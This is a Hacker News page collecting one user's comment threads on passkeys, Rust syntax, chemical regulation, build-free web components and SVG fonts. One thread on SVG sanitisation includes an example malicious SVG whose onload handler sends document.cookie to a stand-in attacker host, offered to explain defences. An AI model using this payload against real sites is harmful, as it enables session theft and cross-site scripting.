bobbylarrybobby's comments | Hacker News

Why would a website leave you with an account but no way to log in aside from the account recovery procedure?

You register from your MacBook, then add your Android phone, then remove your MacBook key, then lose your Android phone.

The messed-up thing is that the simplest backup option is a magic login link, which is obviously less secure. Also, you cannot sync a passkey between platforms unless you use a third-party authenticator, so you have to have a backup method of some sort even if not for recovery reasons.


Try blocks let you encapsulate the early-return behavior of Try-returning operations so that they don't leak through to the surrounding function. This lets you use the ? operator (1) when the Try type doesn't match that of the enclosing function, and (2) when you want to use ? to short-circuit but don't want to return from the enclosing function. For instance, in a function returning Result<T, E>, you could have a try block where you do a bunch of operations with Option and make use of the ? operator, or have ? produce an Err without returning from the enclosing function. Without try blocks, you pretty much need to define a one-off closure or function so that you can isolate the use of ? within its body.
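A minimal sketch of the Option case, assuming nightly Rust (try blocks are still feature-gated) and made-up names (`first_port`, `config`):

    #![feature(try_blocks)]

    use std::collections::HashMap;

    fn first_port(config: &HashMap<String, String>) -> Result<u16, String> {
        // Inside the try block, `?` short-circuits to the block's value
        // (None here) instead of returning from `first_port` itself.
        let port: Option<u16> = try {
            let raw = config.get("port")?; // a missing key yields None
            raw.parse::<u16>().ok()?       // a parse failure also yields None
        };
        port.ok_or_else(|| "no valid port configured".to_string())
    }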

You can also de-mut-ify a variable by simply shadowing it with an immutable version of itself:

    let mut data = foo();
    data.mutate();
    let data = data;

This may be preferable for short snippets, where adding braces, the yielded expression, and indentation is more noise than it's worth.


Variable shadowing felt wrong for a while because it's considered verboten in so many other environments. I use it fairly liberally in Rust now.

It helps that the specific pattern of redeclaring a variable just to change its mutability for the remainder of its scope is about the least objectionable use of shadowing possible.

That's not the only place I use shadowing though. I use it much more liberally.

For example, I feel this is right:

    let x = x.parse()?;

Would it be possible for messenger apps to simply ignore <script> tags (and accept that this will break a small fraction of SVGs)? Or is that not a sufficient defense?

I looked into it for work at some point as we wanted to support SVG uploads. Stripping <script> is not enough to have an inert file. Scripts can also be attached as attributes. If you want to prevent external resources it gets more complex.
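For illustration, a hypothetical file (the URL is made up) that executes script without any <script> element; the handlers fire when the SVG is viewed in a scripting-enabled context such as inline markup, an <object>, or direct navigation:

    <svg xmlns="http://www.w3.org/2000/svg"
         onload="fetch('https://attacker.example/?c=' + document.cookie)">
      <image href="bogus" onerror="alert(document.domain)"/>
    </svg>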

The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.

The solution I ended up implementing was a sandboxed Chromium instance, driven over the DevTools protocol to load the SVG and rasterize it. Users could still upload SVG files, but they were served to other users as rasterized PNGs.
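Not their exact setup (they drove the DevTools protocol directly), but a rough Puppeteer equivalent of the idea, with `svgBase64` standing in for the uploaded file:

    import puppeteer from 'puppeteer';

    // svgBase64: the uploaded SVG, base64-encoded (assumed to exist).
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    // Keep the untrusted SVG's scripts from running while rendering.
    await page.setJavaScriptEnabled(false);
    await page.goto(`data:image/svg+xml;base64,${svgBase64}`);
    // Only pixels ever reach other users.
    const png = await page.screenshot({ type: 'png' });
    await browser.close();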


Shouldn't the ignoring of scripting be done at the user-agent level? Maybe some kind of HTTP header to allow sites to disable scripts in SVG, à la CORS?

It's definitely a possible solution if you control how the files are displayed. In my case I preferred the files to be safe regardless of the mechanism used to view them (less risk of misconfiguration).

    Content-Security-Policy: default-src 'none'

No, SVGs can do `onload` and `onerror`, and can also reference other SVGs that can themselves contain those things (base64'd or behind a URI).

But you can use an `img` tag (`<img src="evil.svg">`) and that'll basically Just Work, or use a CSP. I wouldn't rely on sanitizing, but I'd still sanitize.


> But you can use an `img` tag (`<img src="evil.svg">`) and that'll basically Just Work

That doesn't help much if evil.svg is hosted on the same domain (with the default "Content-Type: image/svg+xml" header), because an attacker can send a direct link to the file.


Reddit horribly breaks direct links to images and serves html instead.

Shouldn't most chemicals be assumed unsafe until proven otherwise? How many chemicals have we produced in a lab that have no harmful effects? Even medicine is bad for you, it's just better than the disease it's meant to treat. I don't know why we'd treat something designed to kill animals as safe for humans without studies showing that it's not harmful. (Well I do know why, but I don't know why voters go along with it.)

Literally everything is "chemicals".

And when we're talking about things in this realm, the general saying is "The dose makes the poison"... Water will kill you if you drink enough of it.

And we do have all sorts of studies on the immediately apparent harms of these substances (they all have safety sheets and maximum safe exposure levels). What we're missing, mainly because it's just incredibly hard to source ethically, is long-term studies.

So the question you're really asking is "what's your tolerance to risk?". I think it's fine to have different governing bodies take different stances on that scale. What's less fine is failure to act on information because of profit motives.

Long story short - this isn't so simple. You bathe in chemicals all day every day.


I daresay that the issue is less about "chemicals" and more about "new chemicals". If a substance already exists in nature and has been in use for a long time, then it's reasonable to take the position that it is probably within harm limits. If it's a newly synthesised/extracted substance, then it should be subject to reasonable testing.

Also, if a chemical is known to be toxic, then rigorous testing should be performed before allowing it to be widely distributed and used.


> If a substance already exists in nature and has been in use for a long time, then it's reasonable to take the position that it is probably within harm limits.

Reasonable, but wrong.

Simple case: Did you know that occupational sawdust exposure is strongly associated with cancer in the paranasal sinuses and nasal cavity?

There's also some pretty compelling evidence that common respiratory viruses (including coronaviruses) are associated with dementia/Alzheimer's.

Alcohol increases cancer rates more than some of the "chemicals" people will complain about. So does bacon. So does sunlight.

All of which have been floating around in human contact for a LONG time.

Again - we do a pretty good job at filtering out the stuff that's fast acting and harmful. It's just really difficult to tease out information that requires long term monitoring and involves small/moderate increases in risk.

Think about how long it took us to figure out that lead exposure is really nasty. We used lead for thousands of years prior, and it's literally a base element.

---

As for

> Also, if a chemical is known to be toxic, then rigorous testing should be performed before allowing it to be widely distributed and used.

No one is arguing otherwise, and normally large and expensive studies are done on short term harm (extensive animal testing). But you tell me how we can reasonably and ethically do longitudinal studies on large groups of humans to determine if a new substance is going to cause small/moderate cancer rate bumps over 50+ years?

This is just a genuinely difficult problem to address, and it's not like we can simply go "wait 50 years and see"! Because usually we're trying to use these things to address existing problems. E.g., pesticides and fertilizers might still be net positives even with the cancer risk - do we avoid them and let people starve today? Or feed everyone now and have a 10% bump in cancer rates 50 years later? There's no golden ticket here.


>Shouldn't most chemicals be assumed unsafe until proven otherwise?

Of course not, that would be bad for capitalists. /s


On the one hand I can see the appeal of not having a build step. On the other, given how many different parts of the web dev pipeline require one, it seems very tricky to get all of your dependencies to be build-step-free. And with things like HMR the cost of a build step is much ameliorated.

I haven't run into any steps that require one; there are always alternatives.

Do you have anything specific in mind?


Anything that uses JSX syntax, for instance.

Any kind of downleveling, though that's less important these days: most users only need polyfills, and new syntax features like `using` are not widely used.

Minification and bundling for the web are still somewhat necessary. ESM is still tricky to use without assistance.

None of these are necessary. But if you use any of them you've already committed to having a build step, so adding in a typescript-erasure step isn't much extra work.


If there is one thing I don't miss when using Web Components, it's JSX. lit-html is much, much better.

It's such a lovely and simple stack.

No Lit Element or Lit or whatever it's branded now, no framework, just vanilla web components: lit-html in a render() method, class properties for reactivity, JSDoc for opt-in typing, using it where it makes sense but not junking up the code base where it's not needed...

No build step, no bundles, most things stay in light dom, so just normal CSS, no source maps, transpiling or wasted hours with framework version churn...

Such a wonderful and relaxing way to do modern web development.
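A minimal sketch of the pattern, assuming lit-html is available through an import map or CDN (the element and property names are made up):

    import { html, render } from 'lit-html';

    class HelloCard extends HTMLElement {
      // A plain class property plus a setter is all the "reactivity" needed.
      set name(value) {
        this._name = value;
        this.update();
      }
      connectedCallback() { this.update(); }
      update() {
        // Render into the element itself: light DOM, so normal CSS applies.
        render(html`<p>Hello, ${this._name ?? 'world'}!</p>`, this);
      }
    }
    customElements.define('hello-card', HelloCard);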


I love it. I've had a hard time convincing clients it's the best way to go, but my side projects, recent and future, will always start with this frontend stack and nothing more until it's truly necessary.

This discussion made me happy to see more people enjoying the stack available in the browser. I think over time, what devs enjoy using is what becomes mainstream; React was the same fresh breeze in the past.

I recently used Preact and HTM for a small side project, for the JSX-like syntax without a build step.

You can combine the second and third strategies to hit the sweet spot of time and space.

You brought up an important opportunity for optimization. If you know the distribution of your data, it may make more sense to implement it in terms of the odd numbers and leave even numbers as the fallback. It's important to profile with a realistic distribution of data to make sure you're targeting the correct parity of numbers.

Safari supports base64-embedding font files in a <style>'s @font-face {} (IIRC it's something like `@font-face { src: url('data:application/x-font-woff;charset=utf-8;base64,...'); }`) that can then be referenced as normal throughout the SVG. I don't recommend this, though; nobody wants to deal with 500 KB SVGs.

The idea was that you can embed only the glyphs used in a text. For example, instead of embedding thousands of existing Chinese characters, embed only 20 of them. Embedding is necessary anyway because otherwise you cannot guarantee that your image will be displayed correctly on the other machine.

Also, allowing CSS inside SVG is not a great idea, because the SVG renderer then needs to include a full CSS parser. For example, will Inkscape work correctly when there is embedded CSS with base64 fonts? Not sure.


> Also, allowing CSS inside SVG is not a great idea, because the SVG renderer then needs to include a full CSS parser. For example, will Inkscape work correctly when there is embedded CSS with base64 fonts? Not sure.

For better or worse, CSS parsing and WOFF support are both mandatory in SVG 2.[0][1] Time will tell whether this makes it a dead spec!

[0] https://www.w3.org/TR/SVG2/styling.html#StylingUsingCSS

[1] https://www.w3.org/TR/SVG2/text.html#FontsGlyphs


That's how OpenCL died. They made difficult-to-implement features mandatory.

You can also point to font files with @font-face. I use a small custom font that's only 16 KB. Although, when opening the file locally, you have to first disable local file restrictions in Safari's settings before it works...

  <defs>
    <style type="text/css">
      @font-face {
        font-family: 'A-font';
        src: url('A-font.woff') format('woff');
        font-weight: normal;
        font-style: normal;
      }
    </style>
  </defs>

So if you save the SVG image, it won't display without Internet connection. Not great.

I don't think that helps with embedding fonts.

How well can LLMs reason about avoiding UB? This seems like one of those things where no matter how much code you look at, you can still easily get wrong (as humans frequently do).
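For instance, a classic example: this looks like a reasonable overflow check, but signed overflow is undefined behavior in C, so the compiler may assume it never happens and silently delete the branch:

    #include <limits.h>
    #include <stdio.h>

    int main(void) {
        int x = INT_MAX;
        // UB: signed overflow. Optimizers routinely fold `x + 1 < x`
        // to false and remove the "detected" path entirely.
        if (x + 1 < x) {
            puts("overflow detected");
        }
        return 0;
    }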

Fair point on UB — LLMs absolutely do not reason about it (or anything else). They just reproduce the lowest-common-denominator patterns that happened to survive in the wild.

I’m not claiming the generated C is “safe” or even close. I am sure that in practice it still has plenty of time-bombs, but empirically, for the narrow WASM tasks I tried, the raw C suggestions were dramatically less wrong than the equivalent JavaScript ones — fewer obvious foot-guns, better idioms, etc.

So my original “noticeably better” was really about “fewer glaring mistakes per 100 lines” rather than “actually correct.” I still end up rewriting or heavily massaging almost everything, but it’s a better starting point than the JS ever was.

